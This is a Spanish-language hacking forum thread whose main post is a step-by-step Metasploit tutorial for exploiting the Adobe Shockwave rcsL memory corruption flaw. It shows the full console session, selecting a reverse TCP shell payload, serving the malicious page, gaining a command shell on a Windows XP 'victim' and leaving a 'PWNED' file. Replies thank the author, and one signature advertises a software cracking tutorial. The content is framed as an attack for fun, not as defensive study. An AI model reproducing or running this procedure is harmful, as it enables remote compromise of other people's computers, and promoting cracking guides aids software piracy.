Mostrar mensajes previos
Ordenar por
por Skillmax Usa camisa de fuerza
Bueno gente les traigo adobe_shockwave_rcsl_corruption un 0day que salió hace poco (21/10/2010) y ya lo pueden disfrutar de la mano de la gente de Metasploit que no se les escapa una, por lo que estuve leyendo funciona tanto en XP, como en Vista y Seven(solo lo probé en XP), el tutorial está creado por rus0pr0, iba a hacer yo uno, pero se adelantó, para el que quiere un poco más de información les dejo el siguiente link:

[Enlace externo eliminado para invitados]


Ok, vamos a lo divertido, sudo ./msfconsole y empezamos:


Código: Seleccionar todo

#    # ###### #####   ##    ####  #####  #       ####  # #####
##  ## #        #    #  #  #      #    # #      #    # #   #
# ## # #####    #   #    #  ####  #    # #      #    # #   #
#    # #        #   ######      # #####  #      #    # #   #
#    # #        #   #    # #    # #      #      #    # #   #
#    # ######   #   #    #  ####  #      ######  ####  #   #

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 615 exploits - 306 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r10780 updated today (2010.10.22)

msf > use  windows/browser/adobe_shockwave_rcsl_corruption
msf exploit(adobe_shockwave_rcsl_corruption) > info

       Name: Adobe Shockwave rcsL Memory Corruption
    Version: 10779
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  David Kennedy "ReL1K" <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)

Payload information:
  Space: 1024
  Avoid: 4 characters

Description:
  This module exploits a weakness in the Adobe Shockwave player's 
  handling of Director movies (.DIR). A memory corruption 
  vulnerability occurs through an undocumented rcsL chunk. This 
  vulnerability was discovered by http://www.abysssec.com.

References:
  http://www.exploit-db.com/sploits/Adobe_Shockwave_Director_rcsL_Chunk_Memory_Corruption.zip



Miramos los payloads que podemos usar:


Código: Seleccionar todo

msf exploit(adobe_shockwave_rcsl_corruption) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective Dll Injection, Bind TCP Stager
   windows/dllinject/reverse_http                                    normal  Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective Dll Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective Dll Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective Dll Injection, Reverse TCP Stager (DNS)
   windows/download_exec                                             normal  Windows Executable Download and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt injection), Bind TCP Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)


Seteamos el payload, rellenamos con la informacion que necesitemos y nos fijamos si esta ok:


Código: Seleccionar todo

msf exploit(adobe_shockwave_rcsl_corruption) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(adobe_shockwave_rcsl_corruption) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(adobe_shockwave_rcsl_corruption) > set URIPATH /
URIPATH => /
msf exploit(adobe_shockwave_rcsl_corruption) > set SRVPORT 80
SRVPORT => 80
msf exploit(adobe_shockwave_rcsl_corruption) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST     192.168.1.101    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



Todo bien, lo explotamos:

Código: Seleccionar todo

msf exploit(adobe_shockwave_rcsl_corruption) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.101:4444 
[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.101:80/
[*] Server started.

Le pasamos la dirección al navegador:


Imagen



Imagen



Código: Seleccionar todo

msf exploit(adobe_shockwave_rcsl_corruption) > [*] Sending exploit HTML to 192.168.1.100:1051...
[*] Sending exploit DIR to 192.168.1.100:1054...
[*] Sending stage (240 bytes) to 192.168.1.100
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.100:1055) at Fri Oct 22 07:22:58 -0300 2010
[*] Session ID 1 (192.168.1.101:4444 -> 192.168.1.100:1055) processing InitialAutoRunScript 'migrate -f'
[-] Error: Command shell sessions do not support migration


Ya tenemos shell(al error no le den bola es porque al subir la shell trata de migrarla a otro proceso como si fuera meterpreter, pero con la shell no se puede)

Bueno vemos las sesiones disponibles, interactuamos, le dejamos un saludo a la víctima en el escritorio y nos vamos.

Código: Seleccionar todo

msf exploit(adobe_shockwave_rcsl_corruption) > sessions

Active sessions
===============

  Id  Type   Information  Connection
  --  ----   -----------  ----------
  1   shell               192.168.1.101:4444 -> 192.168.1.100:1055

msf exploit(adobe_shockwave_rcsl_corruption) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>echo "PWNED :), hasta la proxima" > pwned.txt
echo "PWNED :), hasta la proxima" > pwned.txt

C:\Documents and Settings\Administrator\Desktop>[*] Command shell session 1 closed.

Imagen



---


¡¡Vamos arriba, INDETECTABLES!!
por PackNot Se conecta desde un manicomio
Excelente Skillmax
me servira mucho ya que me voy iniciando en esto de Metasploit!
saludos!
Imagen

♪♪ 2pac & Notorius B.I.G ♪♪
¿Por qué estoy luchando para vivir cuando estoy solo viven para luchar,
¿Por qué estoy tratando de ver cuando no hay nada a la vista,
¿Por qué estoy tratando de dar cuando nadie me da una oportunidad,
¿Por qué estoy muriendo para vivir cuando yo estoy viviendo para morir.♪♪
por osnaraus Usa camisa de fuerza
droopy escribió:Podrian subir el exploit ya compilado?
No se usar el metasploit.
Gracias
Haz leido el post completo?
Suerte amigo, y si quieres utilizar exploits te recomiendo 2 cosas
1) Descarga metasploit (es gratuito)
2) Busca manuales y lee, lee mucho... que el camino es largo
Imagen
por Harker_123 Se conecta desde un manicomio
Disculpa no se mucho de esto. Donde se configura la ip remota? No entiendo el funcionamiento.
Mega Tutorial para Crackear CUALQUIER programa o juego --> http://tinyurl.com/tutorial-cracking
Imagen

Mostrar/Ocultar

Temas similares
Exploit Adobe Acrobat Reader DC por xrahitel en Manuales y Tutoriales
Links sobre el tema
Variantes de tema
Responder

Volver a “Exploits”